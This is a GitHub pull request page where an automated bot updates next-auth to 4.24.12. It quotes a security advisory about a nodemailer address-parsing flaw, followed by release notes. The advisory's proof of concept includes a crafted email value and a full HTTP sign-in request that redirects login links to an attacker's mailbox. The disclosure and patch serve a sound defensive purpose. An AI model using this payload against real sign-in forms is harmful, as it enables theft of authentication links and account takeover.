Skip to content
This repository was archived by the owner on Jun 3, 2026. It is now read-only.

⬆️ Update dependency next-auth to v4.24.12 [SECURITY]#2336

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-next-auth-vulnerability
Open

⬆️ Update dependency next-auth to v4.24.12 [SECURITY]#2336
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-next-auth-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Mar 1, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
next-auth (source) 4.24.54.24.12 age confidence

NextAuthjs Email misdelivery Vulnerability

GHSA-5jpx-9hw9-2fx4

More information

Details

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version Afftected
4.24.11 Yes
5.0.0-beta.29 Yes
POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@&#8203;auth/prisma-adapter"
import { prisma } from "@&#8203;/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})
POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47
Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

nextauthjs/next-auth (next-auth)

v4.24.12

Compare Source

v4.24.11

Compare Source

v4.24.10

Compare Source

What's Changed

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@4.24.9...next-auth@4.24.10

v4.24.9

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@4.24.8...next-auth@4.24.9

v4.24.8

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@4.24.7...next-auth@4.24.8

v4.24.7

Compare Source

Others

v4.24.6

Compare Source

Bugfixes


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot changed the title ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate
renovate Bot deleted the renovate/npm-next-auth-vulnerability branch March 27, 2026 05:00
@renovate renovate Bot changed the title ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] - autoclosed ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate
renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from c62d707 to bfe838d Compare March 30, 2026 17:55
@renovate renovate Bot changed the title ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] - autoclosed ⬆️ Update dependency next-auth to v4.24.12 [SECURITY] Apr 28, 2026
@renovate renovate Bot reopened this Apr 28, 2026
@renovate
renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from bfe838d to 44f9332 Compare April 28, 2026 06:32
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants